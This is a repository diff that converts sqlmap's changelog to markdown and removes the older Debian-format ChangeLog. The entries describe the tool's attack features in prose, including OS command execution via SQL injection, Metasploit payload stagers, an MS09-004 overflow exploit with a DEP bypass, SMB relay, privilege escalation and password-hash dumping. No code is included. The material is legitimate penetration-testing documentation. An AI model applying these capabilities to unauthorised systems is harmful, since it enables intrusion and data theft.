+* Major silent bug fix to multi-threading functionality.
+* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided.
+* Fixed MySQL 'comment injection' version fingerprint.
+* Fixed basic Microsoft SQL Server 2000 fingerprint.
+* Many minor bug fixes and code refactoring.
+
+# Version 0.7 release candidate (2009-04-22)
+
+* Added support to execute arbitrary commands on the database server underlying operating system either returning the standard output or not via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored procedure on Microsoft SQL Server;
+* Added support for out-of-band connection between the attacker box and the database server underlying operating system via stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux;
+* Added support for out-of-band connection via Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support;
+* Added support for out-of-band connection via SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit;
+* Added support to read and write (upload) both text and binary files on the database server underlying file system for MySQL, PostgreSQL and Microsoft SQL Server;
+* Added database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable;
+* Speed up the inference algorithm by providing the minimum required charset for the query output;
+* Major bug fix in the comparison algorithm to correctly handle also the case that the url is stable and the False response changes the page content very little;
+* Many minor bug fixes, minor enhancements and layout adjustments.
+
+# Version 0.6.4 (2009-02-03)
+
+* Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object;
+* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology;
+* Major speed increase in DBMS basic fingerprint;
+* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator;
+* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing;
+* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment;
+* Minor layout adjustment to the `--update` output;
+* Increased default timeout to 30 seconds;
+* Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle;
+* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable;
+* Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server;
+* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided;
+* Updated documentation.
+
+# Version 0.6.3 (2008-12-18)
+
+* Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l <filepath>;
+* Major enhancement to support Partial UNION query SQL injection technique too;
+* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality;
+* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`;
+* Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers;
+* Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided;
+* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher;
+* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`;
+* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user;
+* Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
+* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content;
+* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set;
+* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords;
+* Minor improvements to sqlmap Debian package files;
+* Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations;
+* Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url;
+* Major bug fix to correctly enumerate columns on Microsoft SQL Server;
+* Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified;
+* Minor bug fix to correctly dump table entries when the column is provided;
+* Minor bug fix to correctly handle session.error, session.timeout and httplib.BadStatusLine exceptions in HTTP requests;
+* Minor bug fix to correctly catch connection exceptions and notify to the user also if they occur within a thread;
+* Increased default output level from 0 to 1;
+* Updated documentation.
+
+# Version 0.6.2 (2008-11-02)
+
+* Major bug fix to correctly dump tables entries when `--stop` is not specified;
+* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0;
+* Major bug fix when the request is POST to also send the GET parameters if any have been provided;
+* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`;
+* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file;
+* Minor bug fix in MySQL comment injection fingerprint technique;
+* Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database;
+* Minor improvement to be able to dump entries on MySQL < 5.0 when database name, table name and column(s) are provided;
+* Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
+* More user-friendly warning messages.
+
+# Version 0.6.1 (2008-08-20)
+
+* Major bug fix to blind SQL injection bisection algorithm to handle an exception;
+* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
+* Implemented possibility to test for and inject also on LIKE statements;
+* Implemented `--start` and `--stop` options to set the first and the last table entry to dump;
+* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool;
+* Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes;
+* Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore;
+* Minor bug fix to correctly handle parameters' value with `%` character.
+
+# Version 0.6 (2008-09-01)
+
+* Complete code refactor and many bugs fixed;
+* Added multithreading support to set the maximum number of concurrent HTTP requests;
+* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack;
+* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator;
+* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file;
+* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option;
+* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages;
+* Created sqlmap .exe (Windows) portable executable;
+* Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times;
+* Improved automatic check for parenthesis when testing and forging SQL query vector;
+* Now it checks for SQL injection on all GET/POST/Cookie parameters then it lets the user select which parameter to perform the injection on in case that more than one is injectable;
+* Implemented support for HTTPS requests over HTTP(S) proxy;
+* Added a check to handle NULL or not available queries output;
+* More entropy (randomStr() and randomInt() functions in lib/core/common.py) in inband SQL injection concatenated query and in AND condition checks;
+* Improved XML files structure;
+* Implemented the possibility to change the HTTP Referer header;
+* Added support to resume from session file also when running with inband SQL injection attack;
+* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root;
+* Added a check to assure that the provided string to match (`--string`) is within the page content;
+* Fixed various queries in XML file;
+* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it;
+* Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function;
+* Major bug fixed to avoid tracebacks when the testable parameter(s) is dynamic, but not injectable;
+* Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic;
+* Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires;
+* Added support to inject also on Set-Cookie parameters;
+* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`;
+* Renamed some command line options;
+* Added a conversion library;
+* Added code schema and reminders for future developments;
+* Added Copyright comment and $Id$;
+* Updated the command line layout and help messages;
+* Updated some docstrings;
+* Updated documentation files.
+
+# Version 0.5 (2007-11-04)
+
+* Added support for Oracle database management system
+* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins;
+* Added support to extract database users password hash on Microsoft SQL Server;
+* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting;
+* Added support for SQL injection on HTTP Cookie and User-Agent headers;
+* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind();
+* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack;
+* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables;
+* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`);
+* Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default;
+* Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml;
+* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped;
+* Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py;
+* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`);
+* Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces;
+* More minor layout enhancements in some libraries;
+* Renamed DMBS plugins;
+* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
+* Updated all documentation files.
+
+# Version 0.4 (2007-06-15)
+
+* Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS;
+* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
+* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);
+* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);
+* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation <http://sqlmap.org/dev/>;
+* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;
+* Improved logging functionality: passed from banal 'print' to Python native logging library;
+* Added support for more than one parameter in `-p` command line option;
+* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`);
+* Added the command line option `--remote-dbms` to manually specify the remote DBMS;
+* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements;
+* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`);
+* Added support to specify the database table column to enumerate (`-C COL`);
+* Added inband SQL injection (UNION query) support (`--union-use`);
+* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
+* Reviewed the directory tree structure;
+* Split lib/common.py: inband injection functionalities now are moved to lib/union.py;
+* Updated documentation files.
+
+# Version 0.3 (2007-01-20)
+
+* Added module for MS SQL Server;
+* Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check;
+* Added PostgreSQL dbms active fingerprint;
+* Added support for string match (`--string`);
+* Added support for UNION check (`--union-check`);
+* Removed duplicated code, delegated most of features to the engine in common.py and option.py;
+* Added support for `--data` command line argument to pass the string for POST requests;
+* Added encodeParams() method to encode url parameters before making http request;
+* Many bug fixes;
+* Rewritten documentation files;
+* Complete code restyling.
+
+# Version 0.2 (2006-12-13)
+
+* complete refactor of entire program;
+* added TODO and THANKS files;
+* added some papers references in README file;
+* moved headers to user-agents.txt, now -f parameter specifies a file (user-agents.txt) and randomize the selection of User-Agent header;
+* strongly improved program plugins (mysqlmap.py and postgres.py), major enhancements: * improved active mysql fingerprint check_dbms(); * improved enumeration functions for both databases; * minor changes in the unescape() functions;
+* replaced old inference algorithm with a new bisection algorithm.
+* reviewed command line parameters, now with -p it's possible to specify the parameter you know it's vulnerable to sql injection, this way the script won't perform the sql injection checks itself; removed the TOKEN parameter;
+* improved Common class, adding support for http proxy and http post method in hash_page;
+* added OptionCheck class in option.py which performs all needed checks on command line parameters and values;
+* added InjectionCheck class in injection.py which performs check on url stability, dynamics of parameters and injection on dynamic url parameters;
+* improved output methods in dump.py;
+* layout enhancement on main program file (sqlmap.py), adapted to call new option/injection classes and improvements on catching of exceptions.
--- a/doc/ChangeLog
+++ b/doc/ChangeLog
@@ -1,422 +0,0 @@
-sqlmap (0.8rc1-1) stable; urgency=low
-
-  * Major enhancement to the Microsoft SQL Server stored procedure
-    heap-based buffer overflow exploit (--os-bof) to automatically bypass
-    DEP memory protection.
-  * Added support for MySQL and PostgreSQL to execute Metasploit shellcode
-    via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an
-    option instead of uploading the standalone payload stager executable.
-  * Added options for MySQL, PostgreSQL and Microsoft SQL Server to
-    read/add/delete Windows registry keys.
-  * Added options for MySQL and PostgreSQL to inject custom user-defined
-    functions.
-  * Added support for --first and --last so the user now has even more
-    granularity in what to enumerate in the query output.
-  * Minor enhancement to save the session by default in
-    'output/hostname/session' file if -s option is not specified.
-  * Minor improvement to automatically remove sqlmap created temporary
-    files from the DBMS underlying file system.
-  * Minor bugs fixed.
-  * Major code refactoring.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon, 21 Sep 2009 15:00:00 +0000
-
-sqlmap (0.7-1) stable; urgency=low
-
-  * Adapted Metasploit wrapping functions to work with latest 3.3
-    development version too.
-  * Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
-  * Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or
-    --os-bof is selected) when running under Windows because msfconsole
-    and msfcli are not supported on the native Windows Ruby interpreter.
-    This make sqlmap 0.7 to work again on Windows too.
-  * Minor improvement so that sqlmap tests also all parameters with no
-    value (eg. par=).
-  * HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and
-    2.6+.
-  * Major bug fix to sql-query/sql-shell features.
-  * Major bug fix in --read-file option.
-  * Major silent bug fix to multi-threading functionality.
-  * Fixed the web backdoor functionality (for MySQL) when (usually) stacked
-    queries are not supported and --os-shell is provided.
-  * Fixed MySQL 'comment injection' version fingerprint.
-  * Fixed basic Microsoft SQL Server 2000 fingerprint.
-  * Many minor bug fixes and code refactoring.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 25 Jul 2009 10:00:00 +0000
-
-sqlmap (0.7rc1-1) stable; urgency=low
-
-  * Added support to execute arbitrary commands on the database server
-    underlying operating system either returning the standard output or not
-    via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored
-    procedure on Microsoft SQL Server;
-  * Added support for out-of-band connection between the attacker box and
-    the database server underlying operating system via stand-alone payload
-    stager created by Metasploit and supporting Meterpreter, shell and VNC
-    payloads for both Windows and Linux;
-  * Added support for out-of-band connection via Microsoft SQL Server 2000
-    and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer
-    overflow (MS09-004) exploitation with multi-stage Metasploit payload
-    support;
-  * Added support for out-of-band connection via SMB reflection attack with
-    UNC path request from the database server to the attacker box by using
-    the Metasploit smb_relay exploit;
-  * Added support to read and write (upload) both text and binary files on
-    the database server underlying file system for MySQL, PostgreSQL and
-    Microsoft SQL Server;
-  * Added database process' user privilege escalation via Windows Access
-    Tokens kidnapping on MySQL and Microsoft SQL Server via either
-    Meterpreter's incognito extension or Churrasco stand-alone executable;
-  * Speed up the inference algorithm by providing the minimum required
-    charset for the query output;
-  * Major bug fix in the comparison algorithm to correctly handle also the
-    case that the url is stable and the False response changes the page
-    content very little;
-  * Many minor bug fixes, minor enhancements and layout adjustments.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Wed, 22 Apr 2009 10:30:00 +0000
-
-sqlmap (0.6.4-1) stable; urgency=low
-
-  * Major enhancement to make the comparison algorithm work properly also
-    on url not stables automatically by using the difflib Sequence Matcher
-    object;
-  * Major enhancement to support SQL data definition statements, SQL data
-    manipulation statements, etc from user in SQL query and SQL shell if
-    stacked queries are supported by the web application technology;
-  * Major speed increase in DBMS basic fingerprint;
-  * Minor enhancement to support an option (--is-dba) to show if the
-    current user is a database management system administrator;
-  * Minor enhancement to support an option (--union-tech) to specify the
-    technique to use to detect the number of columns used in the web
-    application SELECT statement: NULL bruteforcing (default) or ORDER BY
-    clause bruteforcing;
-  * Added internal support to forge CASE statements, used only by --is-dba
-    query at the moment;
-  * Minor layout adjustment to the --update output;
-  * Increased default timeout to 30 seconds;
-  * Major bug fix to correctly handle custom SQL "limited" queries on
-    Microsoft SQL Server and Oracle;
-  * Major bug fix to avoid tracebacks when multiple targets are specified
-    and one of them is not reachable;
-  * Minor bug fix to make the Partial UNION query SQL injection technique
-    work properly also on Oracle and Microsoft SQL Server;
-  * Minor bug fix to make the --postfix work even if --prefix is not
-    provided;
-  * Updated documentation.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Tue,  3 Feb 2009 23:30:00 +0000
-
-sqlmap (0.6.3-1) stable; urgency=low
-
-  * Major enhancement to get list of targets to test from Burp proxy
-    (http://portswigger.net/suite/) requests log file path or WebScarab
-    proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
-    'conversations/' folder path by providing option -l <filepath>;
-  * Major enhancement to support Partial UNION query SQL injection
-    technique too;
-  * Major enhancement to test if the web application technology supports
-    stacked queries (multiple statements) by providing option
-    --stacked-test which will be then used someday also by takeover
-    functionality;
-  * Major enhancement to test if the injectable parameter is affected by
-    a time based blind SQL injection technique by providing option
-    --time-test;
-  * Minor enhancement to fingerprint the web server operating system and
-    the web application technology by parsing some HTTP response headers;
-  * Minor enhancement to fingerprint the back-end DBMS operating system by
-    parsing the DBMS banner value when -b option is provided;
-  * Minor enhancement to be able to specify the number of seconds before
-    timeout the connection by providing option --timeout #, default is set
-    to 10 seconds and must be 3 or higher;
-  * Minor enhancement to be able to specify the number of seconds to wait
-    between each HTTP request by providing option --delay #;
-  * Minor enhancement to be able to get the injection payload --prefix and
-    --postfix from user;
-  * Minor enhancement to be able to enumerate table columns and dump table
-    entries, also when the database name is not provided, by using the
-    current database on MySQL and Microsoft SQL Server, the 'public'
-    scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
-  * Minor enhancemet to support also --regexp, --excl-str and --excl-reg
-    options rather than only --string when comparing HTTP responses page
-    content;
-  * Minor enhancement to be able to specify extra HTTP headers by providing
-    option --headers. By default Accept, Accept-Language and Accept-Charset
-    headers are set;
-  * Minor improvement to be able to provide CU (as current user) as user
-    value (-U) when enumerating users privileges or users passwords;
-  * Minor improvements to sqlmap Debian package files;
-  * Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
-    library if available to speed up the sqlmap algorithmic operations;
-  * Minor improvement to retry the HTTP request up to three times in case
-    an exception is raised during the connection to the target url;
-  * Major bug fix to correctly enumerate columns on Microsoft SQL Server;
-  * Major bug fix so that when the user provide a SELECT statement to be
-    processed with an asterisk as columns, now it also work if in the FROM
-    there is no database name specified;
-  * Minor bug fix to correctly dump table entries when the column is
-    provided;
-  * Minor bug fix to correctly handle session.error, session.timeout and
-    httplib.BadStatusLine exceptions in HTTP requests;
-  * Minor bug fix to correctly catch connection exceptions and notify to
-    the user also if they occur within a thread;
-  * Increased default output level from 0 to 1;
-  * Updated documentation.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Thu, 18 Dec 2008 10:00:00 +0000
-
-sqlmap (0.6.2-1) stable; urgency=low
-
-  * Major bug fix to correctly dump tables entries when --stop is not
-    specified;
-  * Major bug fix so that the users' privileges enumeration now works
-    properly also on both MySQL < 5.0 and MySQL >= 5.0;
-  * Major bug fix when the request is POST to also send the GET parameters
-    if any have been provided;
-  * Major bug fix to correctly update sqlmap to the latest stable release
-    with command line --update;
-  * Major bug fix so that when the expected value of a query (count
-    variable) is an integer and, for some reasons, its resumed value from
-    the session file is a string or a binary file, the query is executed
-    again and its new output saved to the session file;
-  * Minor bug fix in MySQL comment injection fingerprint technique;
-  * Minor improvement to correctly enumerate tables, columns and dump
-    tables entries on Oracle and on PostgreSQL when the database name is
-    not 'public' schema or a system database;
-  * Minor improvement to be able to dump entries on MySQL < 5.0 when
-    database name, table name and column(s) are provided;
-  * Updated the database management system fingerprint checks to correctly
-    identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
-  * More user-friendly warning messages.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun,  2 Nov 2008 19:00:00 +0000
-
-sqlmap (0.6.1-1) stable; urgency=low
-
-  * Major bug fix to blind SQL injection bisection algorithm to handle an
-    exception;
-  * Added a Metasploit Framework 3 auxiliary module to run sqlmap;
-  * Implemented possibility to test for and inject also on LIKE
-    statements;
-  * Implemented --start and --stop options to set the first and the last
-    table entry to dump;
-  * Added non-interactive/batch-mode (--batch) option to make it easy to
-    wrap sqlmap in Metasploit and any other tool;
-  * Minor enhancement to save also the length of query output in the
-    session file when retrieving the query output length for ETA or for
-    resume purposes;
-  * Changed the order sqlmap dump table entries from column by column to
-    row by row. Now it also dumps entries as they are stored in the tables,
-    not forcing the entries' order alphabetically anymore;
-  * Minor bug fix to correctly handle parameters' value with % character.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 20 Oct 2008 10:00:00 +0000
-
-sqlmap (0.6-1) stable; urgency=low
-
-  * Complete code refactor and many bugs fixed;
-  * Added multithreading support to set the maximum number of concurrent
-    HTTP requests;
-  * Implemented SQL shell (--sql-shell) functionality and fixed SQL query
-    (--sql-query, before called -e) to be able to run whatever SELECT
-    statement and get its output in both inband and blind SQL injection
-    attack;
-  * Added an option (--privileges) to retrieve DBMS users privileges, it
-    also notifies if the user is a DBMS administrator;
-  * Added support (-c) to read options from configuration file, an example
-    of valid INI file is sqlmap.conf and support (--save) to save command
-    line options on a configuration file;
-  * Created a function that updates the whole sqlmap to the latest stable
-    version available by running sqlmap with --update option;
-  * Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.)
-    installation binary packages;
-  * Created sqlmap .exe (Windows) portable executable;
-  * Save a lot of more information to the session file, useful when
-    resuming injection on the same target to not loose time on identifying
-    injection, UNION fields and back-end DBMS twice or more times;
-  * Improved automatic check for parenthesis when testing and forging SQL
-    query vector;
-  * Now it checks for SQL injection on all GET/POST/Cookie parameters then
-    it lets the user select which parameter to perform the injection on in
-    case that more than one is injectable;
-  * Implemented support for HTTPS requests over HTTP(S) proxy;
-  * Added a check to handle NULL or not available queries output;
-  * More entropy (randomStr() and randomInt() functions in
-    lib/core/common.py) in inband SQL injection concatenated query and in
-    AND condition checks;
-  * Improved XML files structure;
-  * Implemented the possibility to change the HTTP Referer header;
-  * Added support to resume from session file also when running with
-    inband SQL injection attack;
-  * Added an option (--os-shell) to execute operating system commands if
-    the back-end DBMS is MySQL, the web server has the PHP engine active
-    and permits write access on a directory within the document root;
-  * Added a check to assure that the provided string to match (--string)
-    is within the page content;
-  * Fixed various queries in XML file;
-  * Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted
-    the library to parse it;
-  * Fixed password fetching function, mainly for Microsoft SQL Server and
-    reviewed the password hashes parsing function;
-  * Major bug fixed to avoid tracebacks when the testable parameter(s) is
-    dynamic, but not injectable;
-  * Enhanced logging system: added three more levels of verbosity to show
-    also HTTP sent and received traffic;
-  * Enhancement to handle Set-Cookie from target url and automatically
-    re-establish the Session when it expires;
-  * Added support to inject also on Set-Cookie parameters;
-  * Implemented TAB completion and command history on both --sql-shell and
-    --os-shell;
-  * Renamed some command line options;
-  * Added a conversion library;
-  * Added code schema and reminders for future developments;
-  * Added Copyright comment and $Id$;
-  * Updated the command line layout and help messages;
-  * Updated some docstrings;
-  * Updated documentation files.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon,  1 Sep 2008 10:00:00 +0100
-
-sqlmap (0.5-1) stable; urgency=low
-
-  * Added support for Oracle database management system
-  * Extended inband SQL injection functionality (--union-use) to all
-    other possible queries since it only worked with -e and --file on
-    all DMBS plugins;
-  * Added support to extract database users password hash on Microsoft
-    SQL Server;
-  * Added a fuzzer function with the aim to parse HTML page looking
-    for standard database error messages consequently improving
-    database fingerprinting;
-  * Added support for SQL injection on HTTP Cookie and User-Agent headers;
-  * Reviewed HTTP request library (lib/request.py) to support the
-    extended inband SQL injection functionality. Splitted getValue()
-    into getInband() and getBlind();
-  * Major enhancements in common library and added checkForBrackets()
-    method to check if the bracket(s) are needed to perform a UNION query
-    SQL injection attack;
-  * Implemented --dump-all functionality to dump entire DBMS data from
-    all databases tables;
-  * Added support to exclude DBMS system databases' when enumeration
-    tables and dumping their entries (--exclude-sysdbs);
-  * Implemented in Dump.dbTableValues() method the CSV file dumped data
-    automatic saving in csv/ folder by default;
-  * Added DB2, Informix and Sybase DBMS error messages and minor
-    improvements in xml/errors.xml;
-  * Major improvement in all three DBMS plugins so now sqlmap does not
-    get entire databases' tables structure when all of database/table/
-    column are specified to be dumped;
-  * Important fixes in lib/option.py to make sqlmap properly work also
-    with python 2.5 and handle the CSV dump files creation work also
-    under Windows operating system, function __setCSVDir() and fixed
-    also in lib/dump.py;
-  * Minor enhancement in lib/injection.py to randomize the number
-    requested to test the presence of a SQL injection affected parameter
-    and implemented the possibilities to break (q) the for cycle when
-    using the google dork option (-g);
-  * Minor fix in lib/request.py to properly encode the url to request
-    in case the "fixed" part of the url has blank spaces;
-  * More minor layout enhancements in some libraries;
-  * Renamed DMBS plugins;
-  * Complete code refactoring, a lot of minor and some major fixes in
-    libraries, many minor improvements;
-  * Updated all documentation files.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun,  4 Nov 2007 20:00:00 +0100
-
-sqlmap (0.4-1) stable; urgency=low
-
-  * Added DBMS fingerprint based also upon HTML error messages parsing
-    defined in lib/parser.py which reads an XML file defining default
-    error messages for each supported DBMS;
-  * Added Microsoft SQL Server extensive DBMS fingerprint checks based
-    upon accurate '@@version' parsing matching on an XML file to get also
-    the exact patching level of the DBMS;
-  * Added support for query ETA (Estimated Time of Arrival) real time
-    calculation (--eta);
-  * Added support to extract database management system users password
-    hash on MySQL and PostgreSQL (--passwords);
-  * Added docstrings to all functions, classes and methods, consequently
-    released the sqlmap development documentation
-    <http://sqlmap.sourceforge.net/dev/>;
-  * Implemented Google dorking feature (-g) to take advantage of Google
-    results affected by SQL injection to perform other command line
-    argument on their DBMS;
-  * Improved logging functionality: passed from banal 'print' to Python
-    native logging library;
-  * Added support for more than one parameter in '-p' command line
-    option;
-  * Added support for HTTP Basic and Digest authentication methods
-    (--basic-auth and --digest-auth);
-  * Added the command line option '--remote-dbms' to manually specify
-    the remote DBMS;
-  * Major improvements in union.UnionCheck() and union.UnionUse()
-    functions to make it possible to exploit inband SQL injection also
-    with database comment characters ('--' and '#') in UNION query
-    statements;
-  * Added the possibility to save the output into a file while performing
-    the queries (-o OUTPUTFILE) so it is possible to stop and resume the
-    same query output retrieving in a second time (--resume);
-  * Added support to specify the database table column to enumerate
-    (-C COL);
-  * Added inband SQL injection (UNION query) support (--union-use);
-  * Complete code refactoring, a lot of minor and some major fixes in
-    libraries, many minor improvements;
-  * Reviewed the directory tree structure;
-  * Splitted lib/common.py: inband injection functionalities now are
-    moved to lib/union.py;
-  * Updated documentation files.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 15 Jun 2007 20:00:00 +0100
-
-sqlmap (0.3-1) stable; urgency=low
-
-  * Added module for MS SQL Server;
-  * Strongly improved MySQL dbms active fingerprint and added MySQL
-    comment injection check;
-  * Added PostgreSQL dbms active fingerprint;
-  * Added support for string match (--string);
-  * Added support for UNION check (--union-check);
-  * Removed duplicated code, delegated most of features to the engine
-    in common.py and option.py;
-  * Added support for --data command line argument to pass the string
-    for POST requests;
-  * Added encodeParams() method to encode url parameters before making
-    http request;
-  * Many bug fixes;
-  * Rewritten documentation files;
-  * Complete code restyling.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 20 Jan 2007 20:00:00 +0100
-
-sqlmap (0.2-1) stable; urgency=low
-
-  * complete refactor of entire program;
-  * added TODO and THANKS files;
-  * added some papers references in README file;
-  * moved headers to user-agents.txt, now -f parameter specifies a file
-    (user-agents.txt) and randomize the selection of User-Agent header;
-  * strongly improved program plugins (mysqlmap.py and postgres.py),
-    major enhancements:
-    * improved active mysql fingerprint check_dbms();
-    * improved enumeration functions for both databases;
-    * minor changes in the unescape() functions;
-  * replaced old inference algorithm with a new bisection algorithm.
-  * reviewed command line parameters, now with -p it's possible to
-    specify the parameter you know it's vulnerable to sql injection,
-    this way the script won't perform the sql injection checks itself;
-    removed the TOKEN parameter;
-  * improved Common class, adding support for http proxy and http post
-    method in hash_page;
-  * added OptionCheck class in option.py which performs all needed checks
-    on command line parameters and values;
-  * added InjectionCheck class in injection.py which performs check on
-    url stability, dynamics of parameters and injection on dynamic url
-    parameters;
-  * improved output methods in dump.py;
-  * layout enhancement on main program file (sqlmap.py), adapted to call
-    new option/injection classes and improvements on catching of
-    exceptions.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Wed, 13 Dec 2006 20:00:00 +0100
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1 @@`
